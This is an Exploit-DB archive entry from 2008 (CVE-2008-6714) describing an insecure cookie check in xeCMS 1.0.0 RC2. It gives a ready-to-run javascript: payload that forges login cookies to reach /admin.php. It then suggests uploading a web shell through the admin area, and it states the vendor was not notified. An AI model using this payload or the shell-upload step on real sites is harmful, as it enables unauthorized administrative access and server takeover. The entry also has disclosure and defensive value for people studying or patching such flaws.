xeCMS 1.0.0 RC2 - Insecure Cookie Handling

Author: t0pP8uZz
type: webapps
platform: php
port: 
date_added: 2008-06-13  
date_updated: 2016-12-07  
verified: 1  
codes: OSVDB-54025;CVE-2008-6714  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comxeCMS-RC2.7z  

raw file: 5818.txt  
-[*]+================================================================================+[*]-
-[*]+	          xeCMS <= 1.0.0 RC2 Insecure Cookie Handling Vulnerability	     +[*]-
-[*]+================================================================================+[*]-



[*] Discovered By: t0pP8uZz
[*] Discovered On: 18 MAY 2008
[*] Script Download: http://downloads.sourceforge.net/phpforume
[*] DORK: N/A



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION:

	xeCMS suffers from a insecure cookie, the admin panel only checks if the cookie exists.
	and not the content. so we can easyily craft a cookie and look like a admin.



[*] Vulnerability:

	javascript:document.cookie = "xecms_username=1; path=/"; document.cookie = "xecms_password=1; path=/";



[*] NOTE/TIP:

	after running the javascript, visit "/admin.php" to view admin area.

	you can also upload a shell thru the admin area's upload feature.



[*] GREETZ:

	milw0rm.com, h4ck-y0u.org, CipherCrew !



[-] peace,

	t0pP8uZz



-[*]+================================================================================+[*]-
-[*]+	          xeCMS <= 1.0.0 RC2 Insecure Cookie Handling Vulnerability	     +[*]-
-[*]+================================================================================+[*]-

# milw0rm.com [2008-06-14]